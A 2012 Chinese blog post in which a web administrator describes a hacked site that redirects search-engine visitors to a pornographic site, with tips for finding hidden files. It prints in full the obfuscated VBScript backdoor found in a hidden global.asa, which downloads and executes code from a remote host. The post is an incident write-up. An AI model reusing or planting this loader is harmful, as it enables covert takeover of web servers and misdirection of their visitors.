2012年11月29日 星期四

在搜尋引擎上被搜尋後點選時會被轉到色情網站

最近公司發生一件網站資安的事件,使用搜尋引擎上搜尋後,點選時會被轉到色情網站,查詢網頁是否有被植入奇怪的程式碼(Javascript 或 Response.redirect 等轉址的程式碼片段),並沒有發現。
奇怪的狀況是開啟瀏覽器直接在網址列輸入網址直接連結,並不會被轉至色情網站,透過 Google、Yahoo、Bing 等搜尋引擎查詢後再點選連結後,即被轉至色情網站。


搜尋網頁也沒有相關的網址的字串出現,檢視色情網站的原始檔也沒有發現這些關鍵字,原本還懷疑有人先在某網站上先使用大量的關鍵字使排名向前,再拿掉關鍵字。
http://www.tellustek.com/web-marking/85-web-marketing-002.html
只好先由自己的網站主機查詢可疑問題。
在茫茫網海中開始找尋可能解決方法,果然有所收穫。

1. 有些奇怪的檔案或資料夾被隱藏,要看到要先「工具->資料夾選項->檢視」,把「隱藏保護的作業系統檔案」的勾勾取消;「隱藏檔案和資料夾」選「顯示所有檔案和資料夾」,這樣一來應該可以看到一些奇怪的檔案。



2. 如果沒有使用global.asa這個檔案,可是根目錄底下卻有隱藏且唯讀的global.asa,不要懷疑將之刪除。若有使用的話,請打開檢查一下,是否有不明的程式碼。

果然發現了這個隱藏的global.asa檔案,好奇心使然,用記事本打開這個檔案一看究竟,發現這個文件前面大堆空白行,在最底部有以下奇怪的程式碼。

<script language="vbscript" runat="server">
sub Session_OnStart
'[elvis]:On Error Resume Next
Execute(Replace(StrReverse("|&|c etucexe neht 0 > )""]sivle["" ,c(rtsni fi |&|gnihtoN = x teS |&|gnihtoN = s teS |&|esolC.s |&|txeTdaeR.s = c |&|""2132bg"" = tesrahC.s |&|2 = epyT.s |&|0 = noitisoP.s |&|ydoBesnopser.x etirW.s |&|nepO.s |&|3 = edoM.s |&|1 = epyT.s |&|)""maertS.bdodA""(tcejbOetaerC.revreS = s teS |&|dneS.x |&|eslaF ,""t""&""x""&""t""&"".""&""ofni.025qq""&""_""&""g""&""/""&""ofni.025qq""&""/""&""/""&"":""&""p""&""t""&""t""&""h"" ,""TEG"" nepO.x |&|)""PTTHLMX.tfosorciM""(tcejbOetaerC.revreS = x teS |&|dnE.esnopseR neht 0 > )""etuc""&""exe"" ,d(rtSnI rO 0 > )""asa."" ,d(rtSnI fi |&|)mroF.tseuqeR & gnirtSyreuQ.tseuqeR(esaCL = d |&|d ,c ,s ,x ,lru miD "), "|&|", VBCRLF))
end sub

另外一點奇怪的事是目前還沒有解決的問題,網站目錄下多了一些奇怪的目錄,目錄內有檔案,但不管是檔案還是目錄,都無法刪除,也無法查看其權限。若有網友知道如何解決,請留言告知,感謝!



PS.以上惡意程式碼請勿濫用。



沒有留言: